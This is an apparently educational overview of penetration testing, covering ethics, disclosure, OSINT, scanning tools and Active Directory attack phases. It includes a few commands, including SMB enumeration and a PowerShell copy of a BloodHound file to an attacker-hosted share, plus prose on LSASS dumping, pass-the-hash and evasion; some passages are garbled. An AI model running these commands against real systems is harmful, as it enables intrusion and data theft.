So, what is penetration testing? Sometimes called a lost art for many. It requires a deep understanding of operating systems like Windows or Linux. A solid grasp of communication protocols we use daily on the internet. Besides that, we must have a broad understanding of the various stages of an actual penetration test. During a Penetration test, we simulate a cyber-attack on computer systems. We also perform a Vulnerability Assessment to check if the target systems contain any weak spots or misconfiguration that need to get patched.For the auditing of these systems, there are various frameworks and methodologies we got to utilize to perform our penetration test
For the Penetration test there are special distributions that aid the testing process and include many securities assessment tools
Before we go into any penetration test ask yourself the following questions:
In which circumstances will the test get performed?
These are all questions we need to answer before starting any penetration engagement. Before beginning any engagement, read this guide for Penetration testers. It has the complete list of things we should do during an engagement.
there is no such thing as an “unhackable” system, nor can any single system be secured unless all the interconnected systems that touch or access the infrastructure are also secured. Logic suggests that, to maximize effectiveness, an organization must implement multiple overlapping protection solutions that work together. Therefore, any failure or circumvention of a personal protection approach does not compromise the entire infrastructure if it fails or is circumvented.
what it means to be an Ethical hacker or Penetration Tester. Many people may have asked the question, what is the difference between a Black Hat and an ethical hacker? The answer to that question comes down to ethics. Is it ethical to do the activities we are performing? If it is not, we are most likely doing hacking that’s not ethical and punishable by the law. Common practices by blackhat hackers:
None of these practices are ethical and should not be performed by ethical hackers or penetration testers. Another important thing to understand is what impact the penetration tests will have. Will it affect the customers, employees, or maybe even production systems? It is crucial to measure and make a risk assessment of all the critical systems to be tested during the penetration test. If any system goes down, we can be held accountable for the action, and it might even get sued if it ends badly. So, to prevent this, make sure we know the network we are testing, and we have set boundaries for the systems we are allowed to test.
If we find a vulnerability in any company’s software, make sure to give the company notice and enough time to fix the issue. If the company has permitted us to disclose the Vulnerability, we can take notice of it and publish it on the internet. We could be sued for irresponsible disclosure if we do not follow these practices. It could be seen as a serious crime, so always be careful of what kind of information we disclose on the internet without proper research.
Most companies with a vulnerability disclosure program will offer a bug bounty if we find a critical vulnerability in their website or production servers. Most disclosure windows will be between 60 to 90 days.
How do ethical hackers or penetration testers find these vulnerabilities? Usually, they will use methods like Static, Dynamic analysis, or fuzzing the application with random data. Once a Vulnerability has been found. Independent security researchers from a CVE authority will test and confirm our findings, and they will be assigned a CVE number, for example, CVE-2022-001253. The first part indicates the year the vulnerability was found, and the second part will be the order of the CVE.
Resources:
Some other handy websites to find CVEs
To find exploits or proof of concepts
Zero-day Vulnerability Database
Before we try to perform penetration tests on a company, we must perform OSINT or open-source intelligence on the companies in scope assets. This method allows for finding much information on the target. Here are a few websites that allow us to find target information.
Things we will be looking for during OSINT are commonly used passwords in data breaches, usernames, emails, and anything that could help gain a foothold into the company during the penetration testing.
For extra information
Video:
The open-source intelligence revolution: Meet the kids outsmarting the CIA | Manas Chawla | TEDxLSE
Open-Source Intelligence (OSINT) in 5 Hours – Full Course – Learn OSINT!
During these phases, we go overactive information gathering; we use common scanning tools and techniques. To see what services and applications are running on the target hosts. This way can see if the target we will attack is vulnerable to known exploits or if there are any common misconfigurations in the software or operating system deployment. Common Tools we use for scanning the target hosts are
Tool is an advanced port scanner to scan a network or a host. It enumerates which kinds of ports are open and what kind of services are running on the ports. Most of the hacking during a penetration test will be an enumeration, which is key to getting the foot into the door to gain initial access to a network eventually. Nmap also has a large script library that you can use to do everything from find the general location of the target to execute a DoS attack.
Source
Video:
Nmap Tutorial for Beginners – 1 – What is Nmap?
Most of the Tools listed above will come with standard penetration testing distros. If they are not pre-installed, you can pull them from Github.
This tool discovers the network. That is, it pulls down IP addresses and mac addresses that connect on the same subnet. It does this by listening to the ARP (Address Resolution Protocol) protocol to find out the live systems in the network.
Source
Netdiscover, ARP Scanner (official repository)
Video:
Using the NetDiscover Tool(Kali Linux Information Gathering part 1 )
This tool is a network proxy that intercepts traffic and modifies the packets sent. It will allow us to send commands to a server that is typically not allowed. It will help us gain access to a targeted web server and gain access. Burp suite is an especially useful tool for bug bounty hunters if they are trying to find vulnerabilities in a target. Burp Suite is most used with the foxyproxy extension on your preferred browser, which works by routing your network requests through a certain port.
Source:
Burp Suite – Application Security Testing Software – PortSwigger
Video:
They are vulnerability scanners searching for standard computer systems: During theses. They do this with a list of known vulnerabilities to see if the computer is running any vulnerable software that could get exploited by the hacker or penetration tester.
Source:
Video:
Host Discovery & Vulnerability Scanning with Nessus
This tool can perform automated SQL injections and take over databases. It could be useful to gain access to a web server or a database server and dump credentials to gain access and gain a foothold in the targeted system.
Video:
Web App Penetration Testing – #8 – SQL Injection With sqlmap
Source:
This tool is used for Fuzzing the targeted system with random data. It keeps sending random data to the web server until the tool finds a vulnerability or misconfiguration.
Source :
GitHub – xmendez/wfuzz : Web application fuzzer
Metasploit is one of the most common exploitation tools. It contains a lot of useful exploits and enumeration tools and makes the life of a penetration tester much easier.
Source:
GitHub – rapid7/metasploit-framework
Video:
Metasploit For Beginners – #1 – The Basics – Modules, Exploits & Payloads
This tool gets information on the active directory domain. It will gather information like a domain name. Impacket is a collection of Python classes for working with network protocols. Impacket focuses on providing low-level programmatic access to the packets and, for some protocols (e.g., SMB1-3 and MSRPC), the protocol implementation itself. Packets can be constructed from scratch and parsed from raw data. The object-oriented API makes it simple to work with deep hierarchies of protocols
Source:
Impacket is a collection of Python classes for working with network protocols.
Video:
Impacket GetUserSPNs & Kerberoasting Explained
Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the passwords of network services. Hydra can perform rapid dictionary attacks against more than 50 protocols.
Source:
Video:
How to use Hydra to brute force login pages
During the network enumeration process. We will scan the network and determine how many systems are on the subnet. From there, we will look at what operating systems are running and which ports on TCP are running. From gathering and collecting all these formations, we could draw a pretty accurate picture of what kind of operating system it is. The ports are usually looking for this for an Active Directory server. The following command we performed for this can is.
Command:
nmap $ip -p- -T4 -A
The command will show us all the ports and services running on the host that NMAP can pull off the targeted host.
Ports that immediately stand out are
SMB stands for Server Message Block. The default ports are 445, 139. It allows clients, like workstations, to communicate with a server like a shared directory.
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username
Specify workgroup
as anonymous user
In your local kali make a directory that you want that file to go into.
mk dir smb
Next, we will run impacket-smbserver
sudo impacket-smbserver -smb2support share $(pwd)
Then we will transfer the file over to that share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\
We choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.
Video:
NetBIOS And SMB Enumeration – Nbtstat & smbclient
Extra sources: SPN Scanning – Service Discovery without Network Port Scanning – Active Directory Security
Credits for information to: GitHub – infosec n1nja/AD-Attack-Defense: Attack and defend active directory using modern post exploitation adversary tradecraft activity
During this phase, the attackers will try to enumerate the services. They can do the following:
Performs service discovery via LDAP queries to a domain controller
Data mining is finding anomalies, patterns, and correlations within large data sets to predict outcomes. Using a broad range of techniques, it can use this information to increase revenues, cut costs, improve customer relationships, reduce risks, and more.
User hunting tracks where users are logged in or have a session in the network. By locating their login or session, we might gain access to that machine, privilege escalation (if required), and operate in the context of the new user. It is most helpful with elevated user accounts.
Video:
Active Directory Enumeration with BloodHound
Active Directory Enumeration with PowerView
AppLocker advances the app control features and functionality of Software Restriction Policies. AppLocker contains new capabilities and extensions that allow the creation to allow or deny apps from running based on unique identities of files and specify which users or groups can run those apps.
Active Directory Federation Services (AD FS), a software component developed by Microsoft, can run on Windows Server operating systems to provide users with single sign-on access to systems and applications’ locations across organizational boundaries. It uses a claims-based access-control authorization model to maintain application security and implement federated identity.
To gain initial access, we must find a way to get into the server. There are multiple ways to get a foothold into the target. These are the ways we can get access to a remote target. There are privileged ways to get access and unauthenticated ways to gain access. The methods below do not require authentication with the web server.
These attack methods require a Ncat listener to Listen for incoming connections. Usually, with command injection, the attacker will inject a command into a text field that will get executed to create a Ncat connection to the attacker’s machine. Some of the attacks will require credentials to gain access.
Usually, to gain access to authenticated services the attacker can deploy several attack methods:
Common attack tools that will be used are
Privilege escalation is the process of moving to a higher privileged account this could be done horizontally or vertically
ZeroLogon (formally: CVE-2020-1472) is a critical vulnerability in Microsoft’s authentication protocol Netlogon, as implemented, prevents fake DHCP servers from infiltrating the network and rerouting
The password for the local admin gets found by looking at all the scripts in the SYSVOL folder.
Kerberos is a computer-network authentication protocol that works based on tickets to allow nodes communicating over a non-secure network to prove their identity to one another securely
Members of the DNSAdmins group have access to network DNS information. The default permissions are as follows: Allow: Read, Write, Create All Child objects.
Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls user and computer accounts’ working environment. Group Policy provides centralized management and configuration of operating systems, applications, and users’ settings in an Active Directory. We can try the following:
Microsoft Exchange Server is a mail server and calendaring server. It runs exclusively on Windows Server operating systems.
allow attackers to steal hashed versions of user passwords and relay clients’ credentials to authenticate to servers.
can escalate privileges with vulnerabilities like stack overflow, stack strings, race condition, use-after-free, and arbitrary write. Stack overflows can be used to achieve code execution. Stack strings can be used to view memory in the program, which may leak data like passwords. A race condition may allow an attacker to run a program’s function twice at the same time; this may allow for modification of a variable that controls access. Use after free and arbitrary write could allow an attacker to modify data which can be later used in a buffer overflow attack.
To circumvent security controls and conceal their actions on compromised systems, attackers use defense evasion techniques. For example, encryption can be used to evade detection, malware can be disguised to evade detection, and legitimate system tools can be used maliciously. To make it harder for defenders to detect and respond to intrusions, defense evasion is aimed at making detection and response more difficult. Cybersecurity experts often use privilege escalation and persistence in conjunction with this concept.
Credential dumping is the process of dumping them onto disk or a network location they should be used for further exploitation
LSASS dumping is a technique used by attackers to extract sensitive information from the LSASS process. This can include sensitive information such as hashed user passwords, password policy information, and security tokens. The LSASS process stores this information in memory, and attackers can use specialized tools to dump the contents of the LSASS process memory into a file.
An attacker uses Pass the Hash (PtH) to authenticate to a remote system or service by using the hash of the password rather than the plaintext password to authenticate. In this technique, password hashes are stored in memory on Windows systems, and these hashes can be used for authentication purposes.
In password spraying, attackers repeatedly try a single, common password on several user accounts to gain unauthorized access to a system or network. In contrast, brute-force attacks attempt to guess the correct password using many different passwords.
to gain Domain Admin access through privilege escalation techniques using Empire, an attacker would typically use modules built into the framework that automate common privilege escalation methods. These might include:
Once the attacker has gained Domain Admin access, they would have complete control over the domain. They could access and manipulate all domain-level resources, including user accounts, group policies, and network resources.
In a Remote Weaponization of WSUS MITM attack, the attacker first gains access to the WSUS server, either by exploiting a vulnerability or by stealing login credentials. When attackers have access to the WSUS server, they can manipulate the update process to perform MITM attacks. For example, the attacker may approve malicious updates deployed to network systems. This update can be malware that can give the attacker access to the systems or a tool that can perform MITM attacks.
During this phase, we will try everything to stay under the radar of the defenders, which means we must do certain stuff to ensure we can always return to the box and set up different listeners. To stay on the target box will have to perform the following actions
Resources
Persistence, Tactic TA0003 – Enterprise | MITRE ATT&CK®
To ensure the attacker is not detected, they can employ several techniques like code obfuscation or encryption to bypass traditional defenses. Here are some common techniques they use to obfuscate their payloads.
Sources
GitHub – oddcod3/Phantom-Evasion: Python antivirus evasion tool
Data masking – Wikipedia
Deobfuscating Python Code (PicoCTF 2022 #30 ‘bloat.py’)
It is recommended to follow the latest trends used by the adversary that is why threat intelligence could help in defending your organization. Besides that, it is recommended to follow the latest best practices.
After we maintain our persistence on the target. We are going to perform post-exploitation tasks. For example, dumping credentials. Some tools we run to perform post-exploitation